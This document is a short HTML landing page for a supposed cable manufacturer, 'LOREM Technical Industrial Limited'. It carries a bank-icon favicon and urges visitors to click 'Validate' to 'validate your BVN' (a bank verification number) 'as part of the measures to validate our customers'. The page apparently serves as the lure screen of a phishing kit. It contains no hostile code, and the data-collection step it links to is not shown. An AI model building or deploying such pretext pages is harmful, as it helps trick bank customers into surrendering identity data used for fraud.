<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>LTIL</title>
    <link rel="stylesheet" href="style.css">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
    <link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.4.0/animate.css">
    <link rel="shortcut icon" href="https://cdn5.vectorstock.com/i/1000x1000/07/64/bank-icon-on-white-background-vector-10090764.jpg">

</head>
<script>
   
</script>
<body>
    <div class="bg animated swing mt-4 col-12 col-md-4 offset-md-4">
        <div class="mt-3">
                <a href="/"><img src="https://cdn3.vectorstock.com/i/1000x1000/96/07/back-arrow-icon-vector-21679607.jpg" height="50" width="50" alt="back"></a>
        </div>
        <div align="center" class="bg-text mt-2">
            LOREM Technical Industrial Limited
        </div>
        <div style="font-style: italic; text-align: center; font-size: 13px; font-weight: bold">
            ready to serve...
        </div>
        <div style="color: black; text-align: center; font-size: 25px; margin-top: 80px; border: 1px solid purple; text-shadow: 3px 3px 5px black;">
            Welcome
        </div>
        <div style="font-style: italic; color: rgb(22, 20, 20); text-align: center" class="mt-5 font-weight-bold">
            as part of the measures to validate our customers, please click the botton below to validate your BVN
        </div>
        <a href="/process">
            <div id="btn" class="btn mt-4 offset-5">
                Validate
            </div> 
        </a>
        
        <div id="bottom">
           Lorem Technical Industrial Limited is a manufacturing company that is ready to give her customer the best wires and cables for an ideal home
        </div>
        <div id="bottom">
            (C) copyright 2019
        </div>
    </div>
</body>
</html>  
